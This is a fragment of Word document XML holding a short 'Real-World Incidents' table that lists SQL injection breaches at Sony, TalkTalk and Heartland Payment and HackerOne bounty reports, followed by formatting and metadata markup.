    <w:p w14:paraId="091B4A67" w14:textId="497AEEDF" w:rsidR="00626652" w:rsidRDefault="00AE42BF" w:rsidP="00AE42BF">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r w:rsidRPr="00AE42BF">
        <w:t>Real-World Incidents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5219"/>
      </w:tblGrid>
      <w:tr w:rsidR="00AE42BF" w:rsidRPr="00AE42BF" w14:paraId="2FA00172" w14:textId="77777777" w:rsidTr="00AE4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0FA7C" w14:textId="77777777" w:rsidR="00AE42BF" w:rsidRPr="00AE42BF" w:rsidRDefault="00AE42BF" w:rsidP="00AE42BF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00AE42BF">
              <w:t>Org</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="40664CE0" w14:textId="77777777" w:rsidR="00AE42BF" w:rsidRPr="00AE42BF" w:rsidRDefault="00AE42BF" w:rsidP="00AE42BF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00AE42BF">
              <w:t>Impact</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE42BF" w:rsidRPr="00AE42BF" w14:paraId="52513810" w14:textId="77777777" w:rsidTr="00AE4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4449D" w14:textId="4187DEC8" w:rsidR="00AE42BF" w:rsidRPr="00AE42BF" w:rsidRDefault="00AE42BF" w:rsidP="00AE42BF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00AE42BF">
              <w:t xml:space="preserve"> Sony (2011)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="29A8F87A" w14:textId="77777777" w:rsidR="00AE42BF" w:rsidRPr="00AE42BF" w:rsidRDefault="00AE42BF" w:rsidP="00AE42BF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00AE42BF">
              <w:t>Full database dump via SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE42BF" w:rsidRPr="00AE42BF" w14:paraId="66A5A0B9" w14:textId="77777777" w:rsidTr="00AE4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08C31" w14:textId="147A78B9" w:rsidR="00AE42BF" w:rsidRPr="00AE42BF" w:rsidRDefault="00AE42BF" w:rsidP="00AE42BF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00AE42BF">
              <w:t xml:space="preserve"> TalkTalk (2015)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="116EE721" w14:textId="77777777" w:rsidR="00AE42BF" w:rsidRPr="00AE42BF" w:rsidRDefault="00AE42BF" w:rsidP="00AE42BF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00AE42BF">
              <w:t>Massive customer data breach via SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE42BF" w:rsidRPr="00AE42BF" w14:paraId="220B0214" w14:textId="77777777" w:rsidTr="00AE4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BAD6" w14:textId="3976116C" w:rsidR="00AE42BF" w:rsidRPr="00AE42BF" w:rsidRDefault="00AE42BF" w:rsidP="00AE42BF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00AE42BF">
              <w:t xml:space="preserve"> Heartland Payment</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3EF39795" w14:textId="77777777" w:rsidR="00AE42BF" w:rsidRPr="00AE42BF" w:rsidRDefault="00AE42BF" w:rsidP="00AE42BF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00AE42BF">
              <w:t>100M+ card details stolen</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00AE42BF" w:rsidRPr="00AE42BF" w14:paraId="746155C9" w14:textId="77777777" w:rsidTr="00AE4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B6FAB" w14:textId="01872944" w:rsidR="00AE42BF" w:rsidRPr="00AE42BF" w:rsidRDefault="00AE42BF" w:rsidP="00AE42BF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00AE42BF">
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="00AE42BF">
              <w:t>HackerOne</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="00AE42BF">
              <w:t xml:space="preserve"> Bounties</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1DD7A1A7" w14:textId="77777777" w:rsidR="00AE42BF" w:rsidRPr="00AE42BF" w:rsidRDefault="00AE42BF" w:rsidP="00AE42BF">
            <w:pPr>
              <w:pStyle w:val="NoSpacing"/>
            </w:pPr>
            <w:r w:rsidRPr="00AE42BF">
              <w:t>Dozens of reports on blind and second-order SQLi</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7CDF1E4A" w14:textId="77777777" w:rsidR="00AE42BF" w:rsidRPr="00AE42BF" w:rsidRDefault="00AE42BF" w:rsidP="00AE42BF"/>
    <w:sectPr w:rsidR="00AE42BF" w:rsidRPr="00AE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A107A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7A3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216D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1D3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114"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3A5A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F54CC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D18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91361"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="62CE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D0584"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="91D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34473"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5CE0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405C3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="602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97D47"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A67E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870BF"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5E00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B48C7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="11D8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2131"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0CC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524387">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="1637222435">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="564950989">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1729954380">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1109157506">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1343628761">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="352267172">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1972590879">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="942803348">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1651717052">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="46875806">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="81507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16"/>
    <w:rsid w:val="00007EFC"/>
    <w:rsid w:val="001B3A4F"/>
    <w:rsid w:val="003D69A6"/>
    <w:rsid w:val="00626652"/>
    <w:rsid w:val="009F247F"/>
    <w:rsid w:val="00A85844"/>
    <w:rsid w:val="00AE42BF"/>
    <w:rsid w:val="00C1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942A"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{D2C4DD28-0263-48E5-B172-F9548E00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5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41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D6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11</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-08T14:59:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-08T22:12:00Z</dcterms:modified>
</cp:coreProperties>
</file>